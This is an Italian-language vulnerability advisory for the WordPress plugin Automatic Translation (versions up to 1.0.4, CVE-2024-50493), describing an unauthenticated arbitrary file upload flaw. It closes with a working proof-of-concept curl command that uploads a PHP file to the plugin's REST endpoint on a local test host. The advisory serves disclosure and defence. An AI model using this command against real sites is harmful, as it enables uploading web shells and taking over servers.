
Automatic Translation <= 1.0.4 - Caricamento arbitrario di file non autenticato
Automatic Translation <= 1.0.4 - Caricamento Arbitrario di File Non Autenticato
Il plugin Automatic Translation per WordPress è vulnerabile a caricamenti arbitrari di file a causa della mancanza di validazione del tipo di file in tutte le versioni fino alla 1.0.4 inclusa. Ciò consente a aggressori non autenticati di caricare file arbitrari sul server del sito interessato, il che potrebbe rendere possibile l'esecuzione remota di codice.
CVE: CVE-2024-50493
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: automatic-translation
curl -X POST \
-F "file_name=info.php" \
-F "file_url=@/tmp/info.php" \
"http://kubernetes.docker.internal/wp-json/automatic-translator/v1/saveDoc"